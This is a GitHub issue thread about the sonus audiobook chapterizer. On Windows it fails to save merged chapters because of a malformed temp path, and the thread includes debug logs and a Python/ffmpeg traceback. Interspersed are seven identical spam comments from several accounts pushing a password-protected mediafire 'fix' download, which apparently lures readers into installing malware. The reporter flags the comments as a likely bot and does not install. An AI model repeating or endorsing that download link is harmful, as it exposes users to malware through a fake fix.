### ISSUE TITLE
Split existing files by chapter fails on some books where chapters span files

### ISSUE THREAD

**Issue by grv688** [digitalec/sonus#11]
I am using version 0.6.5.  Many books split fine by chapter, but a fair number of them don't work.  When I am running the script on a book that fails, I can see the tmp directory fill with files during the extraction step, but during the saving step a failure may happen.  I see two things, but I am not proficient here so I have no idea if either is relevant.

1 - the error happens when a chapter spans two of the input files.
2 - when the error happens, there is a dash "-" instead of a colon ":" where I would expect to see it in a valid path.

Here is a debug level run in PowerShell.  I don't know how to collect ffmpeg stderr output (e.g., how to enable it, where to find it).

Please let me know if there is anything else I can collect and thanks for any help.

[INFO] sonus.chapterizer: Extracting chapter Chapter 6 from noble-house-part-04.mp3
[DEBUG] sonus.chapterizer:      >> File:Noble House - James Clavell\noble-house-part-04.mp3 Start:0.0 End:3155.696326530612
[INFO] sonus.chapterizer: Extracting chapter Chapter 7 from noble-house-part-05.mp3
[DEBUG] sonus.chapterizer:      >> File:Noble House - James Clavell\noble-house-part-05.mp3 Start:0.0 End:2616.581224489796
[INFO] sonus.chapterizer: Extracting chapter Chapter 7 from noble-house-part-06.mp3
[DEBUG] sonus.chapterizer:      >> File:Noble House - James Clavell\noble-house-part-06.mp3 Start:0.0 End:2580.0
[INFO] sonus.chapterizer: Extracting chapter Chapter 8 from noble-house-part-06.mp3

(then later)

[INFO] sonus.chapterizer: Saving chapter to D:\Users\user\Music\Libby/James Clavell/Noble House/7 Chapter 6.mp3
[DEBUG] sonus.chapterizer: Next track is different, track 8
[DEBUG] sonus.chapterizer: Set current chapter to Chapter 7 | Track: 8
[DEBUG] sonus.chapterizer: Checking if next file belongs to this chapter
[DEBUG] sonus.chapterizer: Merging C:\Users\user\AppData\Local\Temp\tmpaw9x79ve\tmp_007.mp3 with C:\Users\user\AppData\Local\Temp\tmpaw9x79ve\tmp_008.mp3
[DEBUG] sonus.chapterizer: Saving to C-\Users\user\AppData\Local\Temp\tmpaw9x79ve\tmp_007.mp3_07.mp3
Traceback (most recent call last):
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\Scripts\sonus.exe\__main__.py", line 7, in <module>
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\click\core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\click\core.py", line 1078, in main
    rv = self.invoke(ctx)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\click\core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\click\core.py", line 783, in invoke
    return __callback(*args, **kwargs)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\sonus\main.py", line 99, in main
    chapterizer.main(arg, output_path, generic, offset, ffmpeg_debug)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\sonus\chapterizer.py", line 229, in main
    merge_chapter_parts(tmpfiles, output_dir, generic_chapters)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\sonus\chapterizer.py", line 189, in merge_chapter_parts
    ffmpeg.run(stream)
  File "C:\Users\user\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\ffmpeg\_run.py", line 325, in run
    raise Error('ffmpeg', out, err)
ffmpeg._run.Error: ffmpeg error (see stderr output for detail)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by grv688** [comment]
There seems to be a bot replying to my issue with a mediafire download.  I did not install as I assume it is malicious.

**Comment by grv688** [comment]
fwiw I saw someone had luck with the warp terminal in another issue.  I am on windows so I installed wsl, then warp within it, then sonus.  That instance works on this book without error, although it's a few extra steps.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by digitalec** [comment]
Hi @grv688. I run this on Linux, so that’s where my testing occurs which explains some bugs when running on Windows. Can you provide the name of the book and I’ll try and replicate this?

**Comment by grv688** [comment]
Hi there. The book is Noble House by James Clavell. Thanks for looking into it!
